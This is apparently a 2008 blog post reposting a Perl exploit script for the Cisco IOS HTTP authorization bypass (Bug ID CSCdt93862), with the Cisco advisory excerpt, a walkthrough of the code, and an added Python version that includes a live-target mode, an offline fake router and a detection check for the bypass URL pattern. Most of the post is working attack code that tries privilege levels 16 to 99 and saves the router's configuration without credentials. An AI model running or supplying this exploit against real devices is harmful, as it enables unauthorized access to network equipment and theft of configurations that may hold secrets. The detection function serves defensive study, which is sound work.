Monday, February 18, 2008

Brute force IOS HTTP authorization vulnerability

#!/usr/bin/perl

#
# Brute force IOS HTTP authorization vulnerability (Cisco Bug ID CSCdt93862).
#
# Usage: perl ios-http-auth.pl <router-address>
# On success the router's configuration is written to a file named after the host.
#

use LWP;
use IO::Handle;

my $host = shift;    # first command-line argument: the target device

print "$host: ";
flush STDOUT;

my $agent = LWP::UserAgent->new;
my $request = HTTP::Request->new(GET => "http://$host/");
my $response = $agent->request($request);
my $level;

# A vulnerable IOS HTTP server answers the root URL with 401 (authentication
# required). Anything else means the target is probably not a Cisco; print the
# Server header if there is one so the reader can see what answered.
if ($response->is_success || $response->code != 401) {
    if ($response->header('Server') ne '') {
        print $response->header('Server');
        print "\n";
    }
    else {
        print "unexpected response, may not be a Cisco.\n";
    }
    exit;
}

# Walk the privilege levels the advisory describes. Which level works depends
# on the IOS release / hardware combination, so each one is tried until a
# request is answered with 200 instead of 401. (The loop also tries 100, one
# past the advisory's 16..99 range; that is harmless.)
for ($level = 16; $level <= 100; $level++) {
    $request->uri("http://$host/level/$level/exec/show/config");
    $response = $agent->request($request);
    if ($response->is_success) {
        # 200: the command ran without credentials; save the returned config.
        open(HOST, ">$host") || die ("Can't open file $host\n");
        print HOST $response->content;
        close(HOST);
        print "exploited.\n";
        exit;
    }
    else {
        # 401 means "try the next level"; any other status is not IOS behaviour.
        if ($response->code != 401) {
            print "unexpected response, may not be a Cisco.\n";
            exit;
        }
    }
}

print "failed.\n";

____________
Credits:
r45c4l

The code was downloaded from here:

http://www.phreedom.org/solar/code/ios-http-auth/ios-http-auth.pl

and credit goes to the phreedom crew.

First have a look here:

http://www.cisco.com/warp/public/707/cisco-sa-20010627-ios-http-level.shtml

----Excerpts---
By sending a crafted URL it is possible to bypass authentication and execute any command on the router at level 15 (enable level, the most privileged level). This will happen only if the user is using a local database for authentication (usernames and passwords are defined on the device itself). The same URL will not be effective against every Cisco IOS software release and hardware combination. However, there are only 84 different combinations to try, so it would be easy for an attacker to test them all in a short period of time.

The URL in question follows this format:

http://<host>/level/xx/exec/....

Where xx is a number between 16 and 99.

This vulnerability is documented as Cisco Bug ID CSCdt93862.
-----------------

As you can see, this is one of the easiest exploits. The main part of the code is

--code--
for ($level = 16; $level <= 100; $level++) {
$request->uri("http://$host/level/$level/exec/show/config");
$response = $agent->request($request);
--------

What the program does: $host is the device name or address given on the command line, and $level runs from 16 upward in the for loop. For each level it requests /level/$level/exec/show/config. If the page is returned successfully (HTTP 200) the response body, which is the router's configuration, is saved to a file named after the host. If the server answers 401 the loop moves on to the next level, and any other status code is taken to mean the target is probably not a Cisco IOS HTTP server, so the script gives up.
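The same probing logic in Python, as an added example that is not part of the original post or of the phreedom script. The HTTP fetch is separated out so the loop can be exercised offline against a constructed fake router, and a second function shows the mirror-image check a defender would run over request paths: IOS privilege levels are 0 to 15, so a /level/NN/exec/ request with NN in 16..99 is the advisory's bypass pattern and nothing else. The host addresses, the fake device and its configuration text are all constructed for this example.

```python
import re
import sys
import urllib.error
import urllib.request
from typing import Callable, Dict, Optional, Tuple

# The advisory's affected range: levels 16..99 (84 combinations).
CANDIDATE_LEVELS = range(16, 100)

# A fetcher returns (status_code, body, Server header). Keeping it pluggable
# lets the probe run offline against the constructed fake device below.
Fetcher = Callable[[str], Tuple[int, str, str]]

# The path shape from the advisory: /level/<nn>/exec/...
LEVEL_PATH_RE = re.compile(r"^/level/(\d+)/exec/")


def bypass_url(host: str, level: int, command: str = "show/config") -> str:
    """Build the crafted URL: http://<host>/level/<level>/exec/<command>."""
    return f"http://{host}/level/{level}/exec/{command}"


def probe_levels(host: str, fetch: Fetcher) -> Dict[str, object]:
    """Same decision logic as the Perl script: the root URL must demand
    authentication (401); then levels 16..99 are tried in turn until one is
    served with 200. Any status other than 401 on a non-matching level is
    taken to mean the target is probably not an IOS HTTP server."""
    status, _body, server = fetch(f"http://{host}/")
    if status != 401:
        return {"result": "not_cisco", "server": server}
    for level in CANDIDATE_LEVELS:
        status, body, _server = fetch(bypass_url(host, level))
        if status == 200:
            return {"result": "exploited", "level": level, "config": body}
        if status != 401:
            return {"result": "not_cisco", "level": level, "status": status}
    return {"result": "failed"}


def bypass_level_in_path(path: str) -> Optional[int]:
    """Detection side. IOS privilege levels are 0..15, so a /level/<nn>/exec/
    request with nn in 16..99 is the bypass pattern. Returns the level when
    the path matches it, None otherwise (including legitimate level 0..15 URLs)."""
    m = LEVEL_PATH_RE.match(path)
    if not m:
        return None
    level = int(m.group(1))
    return level if 16 <= level <= 99 else None


def http_fetch(url: str, timeout: float = 5.0) -> Tuple[int, str, str]:
    """Live fetcher using only the standard library; a 401 arrives as HTTPError."""
    try:
        with urllib.request.urlopen(url, timeout=timeout) as resp:
            return resp.status, resp.read().decode("latin-1"), resp.headers.get("Server", "")
    except urllib.error.HTTPError as err:
        return err.code, "", err.headers.get("Server", "") or ""
    except urllib.error.URLError:
        return 0, "", ""


def make_fake_device(working_level: int, config: str) -> Fetcher:
    """Constructed stand-in for a vulnerable router: this IOS/hardware
    combination accepts exactly one level; every other request gets 401."""
    def fetch(url: str) -> Tuple[int, str, str]:
        parts = url.split("/", 3)
        path = "/" + (parts[3] if len(parts) > 3 else "")
        m = LEVEL_PATH_RE.match(path)
        if m and int(m.group(1)) == working_level:
            return 200, config, "cisco-IOS"
        return 401, "", "cisco-IOS"
    return fetch


def make_non_cisco() -> Fetcher:
    """Constructed stand-in for an ordinary web server that serves / without auth."""
    return lambda url: (200, "<html>hello</html>", "Apache")


if __name__ == "__main__":
    # Live use against a real target: python3 probe.py <router-address>
    print(probe_levels(sys.argv[1], http_fetch))
```

Note that, as the advisory excerpt above says, the bypass only applies when the router authenticates HTTP users against its local user database, so a 401 on every level is what you should expect from a patched device or one using an external AAA server. The detection function deliberately ignores levels 0..15, which are the levels the IOS HTTP server legitimately serves.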

-----[Revision]----
my $host = shift;
This line does not need to be edited: in the main program `shift` takes the first command-line argument from @ARGV, so the script is run as perl ios-http-auth.pl <device-address>. If you would rather not pass the address as an argument you can hard-code it instead, e.g. my $host = '192.0.2.1'; (address is an example).